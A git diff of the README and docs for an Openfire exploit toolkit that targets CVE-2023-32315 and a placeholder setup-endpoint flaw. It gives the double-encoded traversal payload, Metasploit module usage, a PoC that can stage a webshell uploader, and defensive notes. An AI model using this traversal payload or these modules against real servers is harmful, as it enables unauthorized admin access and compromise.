diff --git a/README.md b/README.md index a49e8f9..6400c51 100644 --- a/README.md +++ b/README.md @@ -16,12 +16,12 @@ ## 🔥 Overview -**Openfire Exploit Suite** is a full-spectrum offensive toolkit targeting CVE-2023-32315 (Openfire Admin Console Auth Bypass). Built for red-teamers and researchers, it provides an end-to-end exploit workflow including recon, PoC execution, Metasploit integration, and Burp Extender automation. +**Openfire Exploit Suite** is a full-spectrum offensive toolkit targeting CVE-2023-32315 (Openfire Admin Console Auth Bypass) and a placeholder unauthenticated setup endpoint weakness (CVE-2023-XXXX). It provides an end-to-end exploit workflow including recon, PoC execution, Metasploit integration, and Burp Extender automation. ## 🧩 Modules - **exploit-core/**: Python PoC exploiting unauthenticated access to the Openfire admin console. -- **metasploit-module/**: Custom Ruby module compatible with Metasploit Framework. +- **metasploit-module/**: Custom Ruby exploit modules (admin bypass + setup POST). - **burp-automation/**: Java-based Burp Suite Extender plugin (minimal, Java 17). - **recon-tools/**: Bash toolkit chaining `nmap`, `ffuf`, and `nikto`, with auto-generated `.md` and `.html` reports. @@ -50,15 +50,18 @@ Expected output lines in Burp: > Note: If you want to extend detection (e.g., reflected params, XSS/SQLi heuristics), add a separate `ExploitLogic` class and wire it from `processHttpMessage`, but keep the final JAR free of local interface classes. -## 🚀 CVE-2023-32315 Summary +## 🚀 CVE Targets -Openfire ≤ 4.6.8 allows unauthenticated access to the admin interface via double-encoded path traversal: +| CVE | Module / PoC | Technique | File | +|-----|--------------|-----------|------| +| CVE-2023-32315 | Admin Console Auth Bypass | Double-encoded path traversal | `metasploit-module/exploits/linux/http/openfire_admin_bypass.rb` | +| CVE-2023-XXXX (placeholder) | Unauth Setup POST | Residual setup endpoint parameter injection | `metasploit-module/exploits/linux/http/openfire_setup_unauth.rb` | + +Traversal example: ``` /setup/setup-s/%252e%252e/%252e%252e/admin-login.jsp ``` -Once accessed, an attacker can manually or programmatically upload a webshell, hijack sessions, or escalate to RCE under specific deployment conditions. - ## 🛠 Recon Flow Run: @@ -81,27 +84,43 @@ python3 exploit-core/openfire_exploit.py --target http://:9090 Checks if the bypass URL is accessible and optionally stages a webshell uploader. -## 🩸 Metasploit +## 🩸 Metasploit Modules -Use: +Admin bypass: ```bash use exploit/linux/http/openfire_admin_bypass -set RHOST +set RHOSTS run ``` -Module path: `metasploit-module/exploits/linux/http/openfire_admin_bypass.rb` - +Unauth setup POST (parameter injection placeholder): +```bash +use exploit/linux/http/openfire_setup_unauth +set RHOSTS +set TARGETURI /setup/setup-someform.jsp # adjust if different +run +``` -## 📂 Git Strategy +Both modules live under: +``` +metasploit-module/exploits/linux/http/ +``` +If not copying into the core Metasploit tree, load the local path inside `msfconsole`: +```bash +loadpath /absolute/path/to/openfire-exploit-suite/metasploit-module/exploits +reload_all +``` -Each module is self-contained. Shared `.gitignore` excludes recon output, logs, and IDE artifacts. +## 📂 Git / Repository Slimming -All documentation is mirrored to `/docs/` for GitHub Pages deployment. To regenerate documentation, use: +The included `.gitignore` now excludes: +- Ruby / Bundler artifacts (`.bundle/`, `vendor/bundle/`, `*.gem`) +- Logs & temp (`log/`, `tmp/`, `coverage/`) +- Native build products (`*.o`, `*.so`, `*.dSYM/`) +- Ruby env files (`.ruby-version`, `.rbenv-vars`) +- IDE & build caches -```bash -./recon-tools/gen_docs.sh -``` +Feel free to add large scan outputs (`output/*.txt` or `*.html`) if you want a leaner commit history; sample patterns are commented. ## 📣 Credits @@ -111,7 +130,7 @@ Developed by Taka (2025) as a security research utility in response to active ex To view a rendered version of this documentation: -- [GitHub Pages: docs/index.md](docs/index.md) ← Mirror this README as index.md +- [GitHub Pages: docs/index.md](docs/index.md) ← Mirror of key README content - Hosting enabled via GitHub Pages > Settings > Pages > Source: `main /docs` ## 📸 Screenshots / Demo @@ -123,7 +142,7 @@ Live demo recording with CLI + browser-based confirmation (Burp interaction, FFU For defenders and system administrators: - Upgrade Openfire to **≥ 4.6.9** immediately. -- Disable `/setup/` path in production deployments. +- Disable or harden `/setup/` path in production deployments. - Use WAF to block double-encoded traversal attempts. -- Monitor logs for unusual access to `admin-login.jsp` +- Monitor logs for unusual access to `admin-login.jsp` and lingering setup JSPs. - Use Burp Collaborator or Canary Tokens to trace callback attempts. \ No newline at end of file diff --git a/docs/index.md b/docs/index.md index 19c9037..83a5f07 100644 --- a/docs/index.md +++ b/docs/index.md @@ -10,107 +10,79 @@ ## 🔥 Overview -**Openfire Exploit Suite** is a full-spectrum offensive toolkit targeting CVE-2023-32315 (Openfire Admin Console Auth Bypass). Built for red-teamers and researchers, it provides an end-to-end exploit workflow including recon, PoC execution, Metasploit integration, and Burp Extender automation. +**Openfire Exploit Suite** provides recon → PoC → Metasploit exploitation tooling for: +- CVE-2023-32315 (Admin Console Auth Bypass) +- Placeholder CVE-2023-XXXX (Residual setup POST endpoint abuse) ## 🧩 Modules -- **exploit-core/**: Python PoC exploiting unauthenticated access to the Openfire admin console. -- **metasploit-module/**: Custom Ruby module compatible with Metasploit Framework. -- **burp-automation/**: Java-based Burp Suite Extender plugin (minimal, Java 17). -- **recon-tools/**: Bash toolkit chaining `nmap`, `ffuf`, and `nikto`, with auto-generated `.md` and `.html` reports. +- **exploit-core/**: Python PoC for admin bypass. +- **metasploit-module/**: Ruby modules (bypass + setup POST injection). +- **burp-automation/**: Minimal Burp Extender. +- **recon-tools/**: Automated scanning + report generation. -## 🧠 Burp Extender Plugin (minimal) +## 🩸 Metasploit Modules -Entry point class (required by Burp): -``` -burp-automation/src/main/java/burp/BurpExtender.java +Admin bypass: +```bash +use exploit/linux/http/openfire_admin_bypass +set RHOSTS +run ``` -This class implements `IBurpExtender` and `IHttpListener` and logs basic request URLs. The packaged JAR intentionally includes only the entry class so that Burp’s own API types are used at runtime (avoids interface mismatches). - -Build and load into Burp: - +Unauth setup POST: ```bash -cd burp-automation -./gradlew clean build -jar tf build/libs/burp-automation.jar | sort # should list only: burp/BurpExtender.class (plus META-INF) +use exploit/linux/http/openfire_setup_unauth +set RHOSTS +set TARGETURI /setup/setup-someform.jsp +run ``` -In Burp Suite: Extender → Extensions → Add → `build/libs/burp-automation.jar` - -Expected output lines in Burp: -- `[BurpExtender] IHttpListener registered` -- `[HTTP] https://example/…` (for each intercepted request) - -> Note: If you want to extend detection (e.g., reflected params, XSS/SQLi heuristics), add a separate `ExploitLogic` class and wire it from `processHttpMessage`, but keep the final JAR free of local interface classes. +Module directory: +``` +metasploit-module/exploits/linux/http/ +``` +Local load (if not copied into framework tree): +```bash +loadpath /absolute/path/to/openfire-exploit-suite/metasploit-module/exploits +reload_all +``` ## 🚀 CVE-2023-32315 Summary -Openfire ≤ 4.6.8 allows unauthenticated access to the admin interface via double-encoded path traversal: +Double-encoded traversal to reach admin login: ``` /setup/setup-s/%252e%252e/%252e%252e/admin-login.jsp ``` -Once accessed, an attacker can manually or programmatically upload a webshell, hijack sessions, or escalate to RCE under specific deployment conditions. - ## 🛠 Recon Flow - -Run: ```bash cd recon-tools ./run_recon.sh ``` - -Output: -- `nmap_full_scan.txt` -- `ffuf_results.html` -- `nikto_results.txt` -- `recon_report.md`, `recon_report_*.html` +Generates: nmap_full_scan.txt, ffuf_results.html, nikto_results.txt, recon_report.md / HTML variants. ## 🐍 Python PoC - ```bash python3 exploit-core/openfire_exploit.py --target http://:9090 ``` -Checks if the bypass URL is accessible and optionally stages a webshell uploader. - -## 🩸 Metasploit - -Use: +## 🧠 Burp Extender +Entry: `burp-automation/src/main/java/burp/BurpExtender.java` +Build: ```bash -use exploit/linux/http/openfire_admin_bypass -set RHOST -run +cd burp-automation +./gradlew clean build ``` -Module path: `metasploit-module/exploits/linux/http/openfire_admin_bypass.rb` - -## 📂 Git Strategy - -Each module is self-contained. Shared `.gitignore` excludes recon output, logs, and IDE artifacts. - -## 📣 Credits - -Developed by Taka (2025) as a security research utility in response to active exploitation trends. MIT Licensed. Use responsibly. - -## 📊 GitHub Pages - -To view a rendered version of this documentation: - -- [GitHub Pages: docs/index.md](docs/index.md) -- Hosting enabled via GitHub Pages > Settings > Pages > Source: `main /docs` - -## 📸 Screenshots / Demo - -Live demo recording with CLI + browser-based confirmation (Burp interaction, FFUF hits, webshell upload) coming soon. -- Suggest capturing GIFs via [asciinema.org](https://asciinema.org) or `peek` tool for animated command-line visuals. +## 📂 Repo Slimming +Key `.gitignore` patterns exclude Bundler, logs, coverage, native objects, IDE caches. Optionally extend to large `output/` artifacts. ## 🔐 Defensive Notes +- Upgrade to ≥ 4.6.9 +- Remove/lock `/setup/` after install +- Block double-encoded traversal at edge +- Monitor access to legacy setup JSPs -For defenders and system administrators: -- Upgrade Openfire to **≥ 4.6.9** immediately. -- Disable `/setup/` path in production deployments. -- Use WAF to block double-encoded traversal attempts. -- Monitor logs for unusual access to `admin-login.jsp` -- Use Burp Collaborator or Canary Tokens to trace callback attempts. \ No newline at end of file +## 📣 Credits +Research & tooling by Taka (2025). Use responsibly.